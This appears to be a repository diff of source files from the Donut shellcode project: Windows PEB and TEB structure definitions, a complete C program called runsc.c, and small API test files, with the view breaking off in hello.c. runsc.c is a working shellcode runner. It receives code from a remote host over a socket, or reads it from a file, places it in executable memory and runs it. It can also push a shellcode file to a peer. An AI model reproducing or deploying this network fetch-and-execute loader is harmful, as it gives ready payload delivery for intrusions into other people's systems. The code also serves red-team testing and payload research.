74 typedef struct _PEB {
75 BYTE InheritedAddressSpace;
76 BYTE ReadImageFileExecOptions;
77 BYTE BeingDebugged;
78 BYTE _SYSTEM_DEPENDENT_01;
79
80 LPVOID Mutant;
81 LPVOID ImageBaseAddress;
82
83 PPEB_LDR_DATA Ldr;
84 PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
85 LPVOID SubSystemData;
86 LPVOID ProcessHeap;
87 LPVOID FastPebLock;
88 LPVOID _SYSTEM_DEPENDENT_02;
89 LPVOID _SYSTEM_DEPENDENT_03;
90 LPVOID _SYSTEM_DEPENDENT_04;
91 union {
92 LPVOID KernelCallbackTable;
93 LPVOID UserSharedInfoPtr;
94 };
95 DWORD SystemReserved;
96 DWORD _SYSTEM_DEPENDENT_05;
97 LPVOID _SYSTEM_DEPENDENT_06;
98 LPVOID TlsExpansionCounter;
99 LPVOID TlsBitmap;
100 DWORD TlsBitmapBits[2];
101 LPVOID ReadOnlySharedMemoryBase;
102 LPVOID _SYSTEM_DEPENDENT_07;
103 LPVOID ReadOnlyStaticServerData;
104 LPVOID AnsiCodePageData;
105 LPVOID OemCodePageData;
106 LPVOID UnicodeCaseTableData;
107 DWORD NumberOfProcessors;
108 union
109 {
110 DWORD NtGlobalFlag;
111 LPVOID dummy02;
112 };
113 LARGE_INTEGER CriticalSectionTimeout;
114 LPVOID HeapSegmentReserve;
115 LPVOID HeapSegmentCommit;
116 LPVOID HeapDeCommitTotalFreeThreshold;
117 LPVOID HeapDeCommitFreeBlockThreshold;
118 DWORD NumberOfHeaps;
119 DWORD MaximumNumberOfHeaps;
120 LPVOID ProcessHeaps;
121 LPVOID GdiSharedHandleTable;
122 LPVOID ProcessStarterHelper;
123 LPVOID GdiDCAttributeList;
124 LPVOID LoaderLock;
125 DWORD OSMajorVersion;
126 DWORD OSMinorVersion;
127 WORD OSBuildNumber;
128 WORD OSCSDVersion;
129 DWORD OSPlatformId;
130 DWORD ImageSubsystem;
131 DWORD ImageSubsystemMajorVersion;
132 LPVOID ImageSubsystemMinorVersion;
133 union
134 {
135 LPVOID ImageProcessAffinityMask;
136 LPVOID ActiveProcessAffinityMask;
137 };
138 #ifdef _WIN64
139 LPVOID GdiHandleBuffer[64];
140 #else
141 LPVOID GdiHandleBuffer[32];
142 #endif
143 LPVOID PostProcessInitRoutine;
144 LPVOID TlsExpansionBitmap;
145 DWORD TlsExpansionBitmapBits[32];
146 LPVOID SessionId;
147 ULARGE_INTEGER AppCompatFlags;
148 ULARGE_INTEGER AppCompatFlagsUser;
149 LPVOID pShimData;
150 LPVOID AppCompatInfo;
151 PUNICODE_STRING CSDVersion;
152 LPVOID ActivationContextData;
153 LPVOID ProcessAssemblyStorageMap;
154 LPVOID SystemDefaultActivationContextData;
155 LPVOID SystemAssemblyStorageMap;
156 LPVOID MinimumStackCommit;
157 } PEB, *PPEB;
158
159
160 typedef struct _CLIENT_ID {
161 HANDLE UniqueProcess;
162 HANDLE UniqueThread;
163 } CLIENT_ID, *PCLIENT_ID;
164
165 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
166 typedef struct _ACTIVATION_CONTEXT *PACTIVATION_CONTEXT;
167 typedef struct _TEB_ACTIVE_FRAME *PTEB_ACTIVE_FRAME;
168 typedef struct _TEB_ACTIVE_FRAME_CONTEXT *PTEB_ACTIVE_FRAME_CONTEXT;
169
170 typedef struct _RTL_ACTIVATION_CONTEXT_STACK_FRAME {
171 PRTL_ACTIVATION_CONTEXT_STACK_FRAME Previous;
172 PACTIVATION_CONTEXT *ActivationContext;
173 ULONG Flags;
174 } RTL_ACTIVATION_CONTEXT_STACK_FRAME, *PRTL_ACTIVATION_CONTEXT_STACK_FRAME;
175
176 typedef struct _ACTIVATION_CONTEXT_STACK
177 {
178 PRTL_ACTIVATION_CONTEXT_STACK_FRAME ActiveFrame;
179 LIST_ENTRY FrameListCache;
180 ULONG Flags;
181 ULONG NextCookieSequenceNumber;
182 ULONG StackId;
183 } ACTIVATION_CONTEXT_STACK, *PACTIVATION_CONTEXT_STACK;
184 #define GDI_BATCH_BUFFER_SIZE 310
185
186 typedef struct _GDI_TEB_BATCH
187 {
188 ULONG Offset;
189 ULONG_PTR HDC;
190 ULONG Buffer[GDI_BATCH_BUFFER_SIZE];
191 } GDI_TEB_BATCH, *PGDI_TEB_BATCH;
192
193 typedef struct _TEB_ACTIVE_FRAME_CONTEXT
194 {
195 ULONG Flags;
196 PSTR FrameName;
197 } TEB_ACTIVE_FRAME_CONTEXT, *PTEB_ACTIVE_FRAME_CONTEXT;
198
199 typedef struct _TEB_ACTIVE_FRAME
200 {
201 ULONG Flags;
202 struct _TEB_ACTIVE_FRAME *Previous;
203 PTEB_ACTIVE_FRAME_CONTEXT Context;
204 } TEB_ACTIVE_FRAME, *PTEB_ACTIVE_FRAME;
205
206 #if !defined(_MSC_VER)
207 typedef struct _PROCESSOR_NUMBER {
208 USHORT Group;
209 UCHAR Number;
210 UCHAR Reserved;
211 } PROCESSOR_NUMBER, *PPROCESSOR_NUMBER;
212 #endif
213
214 typedef struct _TEB
215 {
216 NT_TIB NtTib;
217
218 PVOID EnvironmentPointer;
219 CLIENT_ID ClientId;
220 PVOID ActiveRpcHandle;
221 PVOID ThreadLocalStoragePointer;
222 PPEB ProcessEnvironmentBlock;
223
224 ULONG LastErrorValue;
225 ULONG CountOfOwnedCriticalSections;
226 PVOID CsrClientThread;
227 PVOID Win32ThreadInfo;
228 ULONG User32Reserved[26];
229 ULONG UserReserved[5];
230 PVOID WOW32Reserved;
231 LCID CurrentLocale;
232 ULONG FpSoftwareStatusRegister;
233 PVOID SystemReserved1[54];
234 NTSTATUS ExceptionCode;
235 PVOID ActivationContextStackPointer;
236 #ifdef _M_X64
237 UCHAR SpareBytes[24];
238 #else
239 UCHAR SpareBytes[36];
240 #endif
241 ULONG TxFsContext;
242
243 GDI_TEB_BATCH GdiTebBatch;
244 CLIENT_ID RealClientId;
245 HANDLE GdiCachedProcessHandle;
246 ULONG GdiClientPID;
247 ULONG GdiClientTID;
248 PVOID GdiThreadLocalInfo;
249 ULONG_PTR Win32ClientInfo[62];
250 PVOID glDispatchTable[233];
251 ULONG_PTR glReserved1[29];
252 PVOID glReserved2;
253 PVOID glSectionInfo;
254 PVOID glSection;
255 PVOID glTable;
256 PVOID glCurrentRC;
257 PVOID glContext;
258
259 NTSTATUS LastStatusValue;
260 UNICODE_STRING StaticUnicodeString;
261 WCHAR StaticUnicodeBuffer[261];
262
263 PVOID DeallocationStack;
264 PVOID TlsSlots[64];
265 LIST_ENTRY TlsLinks;
266
267 PVOID Vdm;
268 PVOID ReservedForNtRpc;
269 PVOID DbgSsReserved[2];
270
271 ULONG HardErrorMode;
272 #ifdef _M_X64
273 PVOID Instrumentation[11];
274 #else
275 PVOID Instrumentation[9];
276 #endif
277 GUID ActivityId;
278
279 PVOID SubProcessTag;
280 PVOID EtwLocalData;
281 PVOID EtwTraceData;
282 PVOID WinSockData;
283 ULONG GdiBatchCount;
284
285 union
286 {
287 PROCESSOR_NUMBER CurrentIdealProcessor;
288 ULONG IdealProcessorValue;
289 struct
290 {
291 UCHAR ReservedPad0;
292 UCHAR ReservedPad1;
293 UCHAR ReservedPad2;
294 UCHAR IdealProcessor;
295 };
296 };
297
298 ULONG GuaranteedStackBytes;
299 PVOID ReservedForPerf;
300 PVOID ReservedForOle;
301 ULONG WaitingOnLoaderLock;
302 PVOID SavedPriorityState;
303 ULONG_PTR SoftPatchPtr1;
304 PVOID ThreadPoolData;
305 PVOID *TlsExpansionSlots;
306 #ifdef _M_X64
307 PVOID DeallocationBStore;
308 PVOID BStoreLimit;
309 #endif
310 ULONG MuiGeneration;
311 ULONG IsImpersonating;
312 PVOID NlsCache;
313 PVOID pShimData;
314 ULONG HeapVirtualAffinity;
315 HANDLE CurrentTransactionHandle;
316 PTEB_ACTIVE_FRAME ActiveFrame;
317 PVOID FlsData;
318
319 PVOID PreferredLanguages;
320 PVOID UserPrefLanguages;
321 PVOID MergedPrefLanguages;
322 ULONG MuiImpersonation;
323
324 union
325 {
326 USHORT CrossTebFlags;
327 USHORT SpareCrossTebBits : 16;
328 };
329 union
330 {
331 USHORT SameTebFlags;
332 struct
333 {
334 USHORT SafeThunkCall : 1;
335 USHORT InDebugPrint : 1;
336 USHORT HasFiberData : 1;
337 USHORT SkipThreadAttach : 1;
338 USHORT WerInShipAssertCode : 1;
339 USHORT RanProcessInit : 1;
340 USHORT ClonedThread : 1;
341 USHORT SuppressDebugMsg : 1;
342 USHORT DisableUserStackWalk : 1;
343 USHORT RtlExceptionAttached : 1;
344 USHORT InitialThread : 1;
345 USHORT SessionAware : 1;
346 USHORT SpareSameTebBits : 4;
347 };
348 };
349
350 PVOID TxnScopeEnterCallback;
351 PVOID TxnScopeExitCallback;
352 PVOID TxnScopeContext;
353 ULONG LockCount;
354 ULONG SpareUlong0;
355 PVOID ResourceRetValue;
356 PVOID ReservedForWdf;
357 } TEB, *PTEB;
358
359 #endif
+734
-0
payload/runsc.c less more
0
1 /**
2 Copyright © 2016-2019 Odzhan. All Rights Reserved.
3
4 Redistribution and use in source and binary forms, with or without
5 modification, are permitted provided that the following conditions are
6 met:
7
8 1. Redistributions of source code must retain the above copyright
9 notice, this list of conditions and the following disclaimer.
10
11 2. Redistributions in binary form must reproduce the above copyright
12 notice, this list of conditions and the following disclaimer in the
13 documentation and/or other materials provided with the distribution.
14
15 3. The name of the author may not be used to endorse or promote products
16 derived from this software without specific prior written permission.
17
18 THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
19 IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
20 WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21 DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
22 INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
23 (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
25 HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
26 STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
27 ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
28 POSSIBILITY OF SUCH DAMAGE. */
29
30 #if defined(_WIN32) || defined(_WIN64)
31 #ifndef _WIN32_WINNT
32 #define _WIN32_WINNT 0x0502
33 #endif
34 #define WIN
35 #ifndef _WINSOCKAPI_
36 #define _WINSOCKAPI_
37 #endif
38 #include <windows.h>
39 #include <shlwapi.h>
40 #include <winsock2.h>
41 #include <ws2tcpip.h>
42 #define close closesocket
43 #define SHUT_RDWR SD_BOTH
44 #pragma comment(lib, "ws2_32.lib")
45 #pragma comment(lib, "shlwapi.lib")
46 #else
47 #include <unistd.h>
48 #include <sys/socket.h>
49 #include <sys/types.h>
50 #include <sys/mman.h>
51 #include <arpa/inet.h>
52 #include <netdb.h>
53 #include <netinet/in.h>
54 #include <sys/ioctl.h>
55 #include <net/if.h>
56 #include <signal.h>
57 #include <fcntl.h>
58 #endif
59
60 #include <stdio.h>
61 #include <stdint.h>
62 #include <string.h>
63 #include <stdlib.h>
64 #include <time.h>
65 #include <sys/stat.h>
66
67 #define RSC_CLIENT 0
68 #define RSC_SERVER 1
69 #define RSC_EXEC 2
70
71 #define RSC_SEND 0
72 #define RSC_RECV 1
73
74 #define DEFAULT_PORT "4444"
75
76 // structure for parameters
77 typedef struct _args_t {
78 int s, r;
79 char *port, *address, *file;
80 #ifdef WIN
81 char *modules;
82 #endif
83 int port_nbr, ai_family, mode, sim, tx_mode, ai_addrlen, dbg;
84 struct sockaddr *ai_addr;
85 struct sockaddr_in v4;
86 struct sockaddr_in6 v6;
87 char ip[INET6_ADDRSTRLEN];
88 uint32_t code_len;
89 void *code;
90 } args_t;
91
92 #ifdef WIN
93 /**F*****************************************************************/
94 void xstrerror (char *fmt, ...)
95 /**
96 * PURPOSE : Display windows error
97 *
98 * RETURN : Nothing
99 *
100 * NOTES : None
101 *
102 *F*/
103 {
104 char *error=NULL;
105 va_list arglist;
106 char buffer[2048];
107 DWORD dwError=GetLastError();
108
109 va_start (arglist, fmt);
110 wvnsprintf (buffer, sizeof(buffer) - 1, fmt, arglist);
111 va_end (arglist);
112
113 if (FormatMessage (
114 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
115 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
116 (LPSTR)&error, 0, NULL))
117 {
118 printf ("[ %s : %s\n", buffer, error);
119 LocalFree (error);
120 } else {
121 printf ("[ %s : %i\n", buffer, dwError);
122 }
123 }
124 #else
125 #define xstrerror printf
126 #endif
127
128 char *addr2ip(args_t *p)
129 {
130 void *src;
131 #ifdef WIN
132 DWORD ip_size=INET6_ADDRSTRLEN;
133 WSAAddressToString (p->ai_addr, p->ai_addrlen,
134 NULL, (char*)p->ip, &ip_size);
135 #else
136 if (p->ai_family==AF_INET) {
137 src=(void*)&p->v4.sin_addr;
138 } else {
139 src=(void*)&p->v6.sin6_addr;
140 }
141 inet_ntop(p->ai_family, src, p->ip, INET6_ADDRSTRLEN);
142 #endif
143 return p->ip;
144 }
145
146 int init_network (args_t *p)
147 /**
148 * PURPOSE : initialize winsock for windows, resolve network address
149 *
150 * RETURN : 1 for okay else 0
151 *
152 * NOTES : None
153 *
154 *F*/
155 {
156 struct addrinfo *list=NULL, *e=NULL;
157 struct addrinfo hints;
158 int r, t;
159
160 // initialize winsock if windows
161 #ifdef WIN
162 WSADATA wsa;
163 WSAStartup (MAKEWORD (2, 0), &wsa);
164 #endif
165
166 r=0;
167 // set network address length to zero
168 p->ai_addrlen = 0;
169
170 // if no address supplied
171 if (p->address==NULL)
172 {
173 // is it ipv4?
174 if (p->ai_family==AF_INET) {
175 p->v4.sin_family = AF_INET;
176 p->v4.sin_port = htons((u_short)p->port_nbr);
177 p->v4.sin_addr.s_addr = INADDR_ANY;
178 p->ai_addr = (struct sockaddr*)&p->v4;
179 p->ai_addrlen = sizeof (struct sockaddr_in);
180 } else {
181 // else it's ipv6
182 p->v6.sin6_family = AF_INET6;
183 p->v6.sin6_port = htons((u_short)p->port_nbr);
184 p->v6.sin6_addr = in6addr_any;
185 p->ai_addr = (struct sockaddr*)&p->v6;
186 p->ai_addrlen = sizeof (struct sockaddr_in6);
187 }
188 } else {
189 memset (&hints, 0, sizeof (hints));
190
191 hints.ai_flags = AI_PASSIVE;
192 hints.ai_family = p->ai_family;
193 hints.ai_socktype = SOCK_STREAM;
194 hints.ai_protocol = IPPROTO_TCP;
195
196 // get all network addresses
197 t=getaddrinfo (p->address, p->port, &hints, &list);
198 if (t == 0)
199 {
200 for (e=list; e!=NULL; e=e->ai_next)
201 {
202 // copy to ipv4 structure
203 if (p->ai_family==AF_INET) {
204 memcpy (&p->v4, e->ai_addr, e->ai_addrlen);
205 p->ai_addr = (struct sockaddr*)&p->v4;
206 } else {
207 // ipv6 structure
208 memcpy (&p->v6, e->ai_addr, e->ai_addrlen);
209 p->ai_addr = (struct sockaddr*)&p->v6;
210 }
211 // assign size of structure
212 p->ai_addrlen = e->ai_addrlen;
213 break;
214 }
215 freeaddrinfo (list);
216 } else {
217 xstrerror ("getaddrinfo");
218 }
219 }
220 return p->ai_addrlen;
221 }
222
223 void debug(void *bin)
224 {
225 //
226 //__builtin_trap();
227 //raise(SIGTRAP);
228 }
229
230 // allocate read/write and executable memory
231 // copy data from p->code and execute
232 void xcode(args_t *p)
233 {
234 void *bin;
235 int i;
236 int fd[2048];
237
238 if (p->code_len == 0) {
239 printf("[ no code to execute.\n");
240 return;
241 }
242 printf ("[ executing code...");
243
244 #ifdef WIN
245 bin=VirtualAlloc (0, p->code_len,
246 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
247 #else
248 bin=mmap (0, p->code_len,
249 PROT_EXEC | PROT_WRITE | PROT_READ,
250 MAP_ANON | MAP_PRIVATE, -1, 0);
251 #endif
252 if (bin!=NULL)
253 {
254 memcpy (bin, p->code, p->code_len);
255 // create file/socket descriptors to simulate real system
256 // created interesting results on openbsd with limits
257 // to how many files could be open at once..
258 //
259 if (p->sim) {
260 #ifndef WIN
261 for (i=0; i<p->sim && p->sim<2048; i++) {
262 fd[i]=socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
263 }
264 #else
265 // todo
266 for (i=0; i<p->sim && p->sim<2048; i++) {
267 }
268 #endif
269 }
270
271 // debug the code?
272 if (p->dbg) {
273 #if defined(_WIN32) || defined(_WIN64)
274 DebugBreak();
275 #else
276 raise(SIGTRAP);
277 #endif
278 }
279 // execute
280 ((void(*)())bin)();
281 printf("OK!\n");
282 if (p->sim) {
283 #ifndef WIN
284 // close all descriptors
285 for (i=0; i<p->sim && p->sim<2048; i++) {
286 close(fd[i]);
287 }
288 #else
289 // todo
290 #endif
291 }
292 #ifdef WIN
293 VirtualFree (bin, 0, MEM_RELEASE | MEM_DECOMMIT);
294 #else
295 munmap (bin, p->code_len);
296 #endif
297 }
298 }
299
300 void send_data(args_t *p, int s) {
301 FILE *fd;
302 int outlen, len, opt;
303 uint32_t sum;
304 uint8_t buf[BUFSIZ];
305
306 // open file for read in binary mode
307 printf ("[ opening %s for read\n", p->file);
308 fd = fopen(p->file, "rb");
309
310 if (fd != NULL)
311 {
312 // send contents of file
313 printf ("[ sending data\n");
314 for (;;) {
315 // read block
316 outlen = fread(buf, sizeof(uint8_t), BUFSIZ, fd);
317 // zero or less indicates EOF
318 if (outlen <= 0) break;
319 // send contents
320 for (sum=0; sum<outlen; sum += len) {
321 len=send (s, &buf[sum], outlen - sum, 0);
322 if (len <= 0) break;
323 }
324 p->code_len += sum;
325 if (outlen != sum) break;
326 }
327 printf ("[ sent %i bytes\n", p->code_len);
328 fclose(fd);
329 }
330 }
331
332 void recv_data(args_t *p, int s) {
333 int opt, r;
334 fd_set fds;
335 struct timeval tv;
336 void *pv;
337
338 p->code_len = 0;
339 p->code = malloc(BUFSIZ);
340
341 // set to non-blocking mode
342 #ifdef WIN
343 opt=1;
344 ioctlsocket (s, FIONBIO, (u_long*)&opt);
345 #else
346 opt=fcntl(s, F_GETFL, 0);
347 fcntl(s, F_SETFL, opt | O_NONBLOCK);
348 #endif
349 // keep reading until remote disconnects or we run out of memory
350 printf ("[ receiving data\n");
351
352 for (;;) {
353 FD_ZERO(&fds);
354 FD_SET(s, &fds);
355
356 tv.tv_sec = 5;
357 tv.tv_usec = 0;
358 r = select(FD_SETSIZE, &fds, 0, 0, &tv);
359
360 if (r <= 0) {
361 printf ("[ waiting for data timed out or failed\n");
362 break;
363 }
364 // receive a block
365 r = recv(s, (uint8_t*)p->code + p->code_len, BUFSIZ, 0);
366 if (r <= 0) break;
367 p->code_len += r;
368 // resize buffer
369 pv = realloc(p->code, p->code_len + BUFSIZ);
370 // on error, free pointer
371 if(pv == NULL) {
372 p->code_len = 0;
373 free(p->code);
374 p->code = NULL;
375 printf("[ error: out of memory.\n");
376 break;
377 }
378 p->code = pv;
379 }
380 if(p->code_len != 0) {
381 printf ("[ received %i bytes\n", p->code_len);
382 }
383 }
384
385 //
386 int ssr (args_t *p)
387 /**
388 * PURPOSE : send a shellcode or receive one from remote system and execute it
389 *
390 * RETURN : 0 or length of shellcode sent/received
391 *
392 * NOTES : None
393 *
394 *F*/
395 {
396 int s, opt, r, t;
397 fd_set fds;
398 struct timeval tv;
399
400 p->code_len=0;
401
402 // create socket
403 printf ("[ creating socket\n");
404 s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
405 if (s < 0) return 0;
406
407 // ensure we can reuse socket
408 t=1;
409 setsockopt (s, SOL_SOCKET, SO_REUSEADDR, (char*)&t, sizeof (t));
410
411 // bind to port
412 printf ("[ binding to port %s\n", p->port);
413 r = bind(s, p->ai_addr, p->ai_addrlen);
414 if (r == 0) {
415 // listen
416 r = listen (s, 1);
417 if (r == 0) {
418 printf ("[ waiting for connections on %s\n", addr2ip(p));
419 if (r == 0) {
420 t = accept(s, p->ai_addr, &p->ai_addrlen);
421 printf ("[ accepting connection from %s\n", addr2ip(p));
422 if (t > 0) {
423 if (p->tx_mode == RSC_SEND) {
424 send_data(p, t);
425 } else {
426 recv_data(p, t);
427 xcode(p);
428 }
429 }
430 }
431 // close socket to peer
432 shutdown(t, SHUT_RDWR);
433 close(t);
434 } else {
435 perror("listen");
436 }
437 } else {
438 perror("bind");
439 }
440 // close listening socket
441 shutdown(s, SHUT_RDWR);
442 close(s);
443
444 return p->code_len;
445 }
446
447 /**F*****************************************************************/
448 int csr (args_t *p)
449 /**
450 * PURPOSE : opens connection to remote system and sends shellcode
451 *
452 * RETURN : 0 or 1
453 *
454 * NOTES : None
455 *
456 *F*/
457 {
458 int s, r, opt;
459 fd_set fds;
460 struct timeval tv;
461
462 printf ("[ creating socket\n");
463 s = socket(p->ai_family, SOCK_STREAM, IPPROTO_TCP);
464 if (s < 0) return 0;
465
466 // try connect to remote
467 printf ("[ connecting to %s\n", addr2ip(p));
468 r = connect(s, p->ai_addr, p->ai_addrlen);
469
470 if (r == 0) {
471 if (p->tx_mode==RSC_SEND) {
472 send_data(p, s);
473 } else {
474 recv_data(p, s);
475 xcode(p);
476 }
477 } else {
478 xstrerror("connect");
479 }
480 printf ("[ closing connection\n");
481 shutdown(s, SHUT_RDWR);
482 close(s);
483 return 1;
484 }
485
486 /**F*****************************************************************/
487 void xfile(args_t *p)
488 /**
489 * PURPOSE : read contents of shellcode and attempt to execute it locally
490 *
491 * RETURN : Nothing
492 *
493 * NOTES : None
494 *
495 *F*/
496 {
497 FILE *fd;
498 int len;
499 void *pv;
500
501 p->code_len = 0;
502 p->code = NULL;
503
504 printf ("[ reading code from %s\n", p->file);
505 fd = fopen(p->file, "rb");
506
507 if (fd == NULL) {
508 xstrerror("fopen(\"%s\")", p->file);
509 return;
510 }
511 // read contents of file
512 for (;;) {
513 // first loop? allocate block
514 if(p->code == NULL) {
515 p->code = malloc(BUFSIZ);
516 }
517 // read a block of data
518 len = fread((uint8_t*)p->code + p->code_len, sizeof(uint8_t), BUFSIZ, fd);
519 if (len <= 0) break;
520 p->code_len += len;
521 // resize buffer for next read
522 pv = realloc(p->code, p->code_len + BUFSIZ);
523
524 if(pv == NULL) {
525 p->code_len = 0;
526 free(p->code);
527 p->code = NULL;
528 printf("[ error: out of memory!.\n");
529 break;
530 }
531 p->code = pv;
532 }
533 fclose(fd);
534
535 if(p->code_len != 0) {
536 xcode(p);
537 }
538 }
539
540 #ifdef WIN
541 void load_modules(char *names) {
542 HMODULE mod;
543 char *p = strtok(names, ";,");
544
545 while (p != NULL) {
546 printf ("[ loading %s...", p);
547 mod = LoadLibrary(p);
548
549 printf ("%s\n", mod==NULL ? "FAILED" : "OK");
550
551 p = strtok(NULL, ";,");
552 }
553 }
554 #endif
555
556 /**F*****************************************************************/
557 void usage (void) {
558 printf ("\n usage: runsc <address> [options]\n");
559 printf ("\n -4 Use IP version 4 (default)");
560 printf ("\n -6 Use IP version 6");
561 printf ("\n -l Listen mode (required when listening on specific interface)");
562 #ifdef WIN
563 printf ("\n -m <dll> Loads DLL modules. Each one separated by comma or semi-colon");
564 #endif
565 printf ("\n -f <file> Read PIC from <file>");
566 printf ("\n -s <count> Simulate real process by creating file descriptors");
567 printf ("\n -p <number> Port number to use (default is %s)", DEFAULT_PORT);
568 printf ("\n -x Execute PIC (requires -f)");
569 printf ("\n\n Press any key to continue . . .");
570 getchar ();
571
572 exit (0);
573 }
574
575 /**F*****************************************************************/
576 char* getparam (int argc, char *argv[], int *i) {
577 int n=*i;
578 if (argv[n][2] != 0) {
579 return &argv[n][2];
580 }
581 if ((n+1) < argc) {
582 *i=n+1;
583 return argv[n+1];
584 }
585 printf ("[ %c%c requires parameter\n", argv[n][0], argv[n][1]);
586 exit (0);
587 }
588
589 void parse_args (args_t *p, int argc, char *argv[]) {
590 int i;
591 char opt;
592
593 // for each argument
594 for (i=1; i<argc; i++)
595 {
596 // is this option?
597 if (argv[i][0]=='-' || argv[i][1]=='/')
598 {
599 // get option value
600 opt=argv[i][1];
601 switch (opt)
602 {
603 case '4':
604 p->ai_family=AF_INET;
605 break;
606 case '6': // use ipv6 (default is ipv4)
607 p->ai_family=AF_INET6;
608 break;
609 case 'x': // execute PIC, requires -f
610 p->mode=RSC_EXEC;
611 break;
612 case 'd': // debug the code
613 p->dbg=1;
614 break;
615 case 'f': // file
616 p->file=getparam(argc, argv, &i);
617 break;
618 case 'l': // listen for incoming connections
619 p->mode=RSC_SERVER;
620 break;
621 #ifdef WIN
622 case 'm': // windows only, loads modules required by shellcode
623 p->modules = getparam(argc, argv, &i);
624 break;
625 #endif
626 case 's': // create file descriptors before execution
627 p->sim=atoi(getparam(argc, argv, &i));
628 break;
629 case 'p': // port number
630 p->port=getparam(argc, argv, &i);
631 p->port_nbr=atoi(p->port);
632 break;
633 case '?': // display usage
634 case 'h':
635 usage ();
636 break;
637 default:
638 printf ("[ unknown option %c\n", opt);
639 usage();
640 break;
641 }
642 } else {
643 // assume it's hostname or ip
644 p->address=argv[i];
645 p->mode=RSC_CLIENT;
646 }
647 }
648 }
649
650 int main (int argc, char *argv[]) {
651 args_t args;
652 struct stat st;
653
654 #ifdef WIN
655 //
656 PVOID OldValue=NULL;
657 WSADATA wsa;
658
659 //Wow64DisableWow64FsRedirection (&OldValue);
660 LoadLibrary("ws2_32");
661 LoadLibrary("advapi32");
662
663 WSAStartup(MAKEWORD(2,0), &wsa);
664 #endif
665
666 setbuf(stdout, NULL);
667 setbuf(stderr, NULL);
668
669 memset (&args, 0, sizeof(args));
670
671 // set default parameters
672 args.address = NULL;
673 args.file = NULL;
674 args.ai_family = AF_INET;
675 args.port = DEFAULT_PORT;
676 args.port_nbr = atoi(args.port);
677 args.mode = -1;
678 args.tx_mode = -1;
679 args.sim = 0;
680 args.dbg = 0;
681
682 printf ("\n[ run shellcode v0.2\n");
683
684 parse_args(&args, argc, argv);
685
686 // check if we have file parameter and it accessible
687 if (args.file!=NULL) {
688 if (stat (args.file, &st)) {
689 printf ("[ unable to access %s\n", args.file);
690 return 0;
691 }
692 }
693
694 #ifdef WIN
695 if (args.modules != NULL) {
696 load_modules(args.modules);
697 }
698 #endif
699 // if mode is executing
700 if (args.mode == RSC_EXEC) {
701 if (args.file != NULL) {
702 xfile(&args);
703 return 0;
704 } else {
705 printf ("\n[ you've used -x without supplying file with -f");
706 return 0;
707 }
708 }
709 if (init_network(&args)) {
710 // if no file specified, we receive and execute data
711 args.tx_mode = (args.file==NULL) ? RSC_RECV : RSC_SEND;
712
713 // if mode is -1, we listen for incoming connections
714 if (args.mode == -1) {
715 args.mode=RSC_SERVER;
716 }
717
718 // if no file specified, set to receive one
719 if (args.tx_mode == -1) {
720 args.tx_mode = RSC_RECV;
721 }
722
723 if (args.mode == RSC_SERVER) {
724 ssr (&args);
725 } else {
726 csr (&args);
727 }
728 }
729 if(args.code_len != 0) {
730 free(args.code);
731 }
732 return 0;
733 }
+37
-0
payload/test/api_test.c less more
0
1 #define UNICODE
2 #include <windows.h>
3
4 #include "donut.h"
5 #pragma comment(lib, "user32.lib")
6
7 void call_api(FARPROC api, int param_cnt, WCHAR param[DONUT_MAX_PARAM][DONUT_MAX_NAME]);
8 typedef VOID (WINAPI *_DonutApiW)(PWCHAR,PWCHAR,PWCHAR,PWCHAR);
9
10 int main(void) {
11 HMODULE m;
12 _DonutApiW DonutApiW;
13 WCHAR param[4][DONUT_MAX_NAME]={L"arg0",L"arg1",L"arg2",L"arg3"};
14
15 WCHAR msg[4096];
16
17 _snwprintf(msg, ARRAYSIZE(msg),
18 L"param[0] : %ws\r"
19 L"param[1] : %ws\r"
20 L"param[2] : %ws\r"
21 L"param[3] : %ws\r",
22 param[0], param[1], param[2], param[3]);
23
24 MessageBox(NULL, msg, L"Donut Test", MB_OK);
25
26 m = LoadLibrary(L"call_api_dll.dll");
27
28 if(m != NULL) {
29 DonutApiW = (_DonutApiW)GetProcAddress(m, "DonutApiW");
30 if(DonutApiW != NULL) {
31 call_api((FARPROC)DonutApiW, 4, param);
32 }
33 }
34 return 0;
35 }
36
+35
-0
payload/test/call_api_dll.c less more
0 #define WIN32_LEAN_AND_MEAN
1 #define UNICODE
2
3 #include <windows.h>
4 #include "donut.h"
5
6 #pragma comment(lib, "user32.lib")
7
8 __declspec(dllexport)
9 VOID APIENTRY DonutApiW(PWCHAR arg0, PWCHAR arg1, PWCHAR arg2, PWCHAR arg3) {
10 WCHAR msg[4096];
11
12 _snwprintf(msg, ARRAYSIZE(msg),
13 L"param[0] : %s\r"
14 L"param[1] : %s\r"
15 L"param[2] : %s\r"
16 L"param[3] : %s\r",
17 arg0, arg1, arg2, arg3);
18
19 MessageBox(NULL, msg, L"Donut Test", MB_OK);
20 }
21
22 __declspec(dllexport)
23 BOOL APIENTRY DllMain(HMODULE hModule,
24 DWORD ul_reason_for_call,
25 LPVOID lpReserved) {
26 switch (ul_reason_for_call) {
27 case DLL_PROCESS_ATTACH:
28 case DLL_THREAD_ATTACH:
29 case DLL_THREAD_DETACH:
30 case DLL_PROCESS_DETACH:
31 break;
32 }
33 return TRUE;
34 }
+56
-0
payload/test/hello.c less more
0 #define UNICODE
1
2 #include <stdint.h>
3 #include <stdio.h>
4 #include <stdlib.h>
5 #include <string.h>
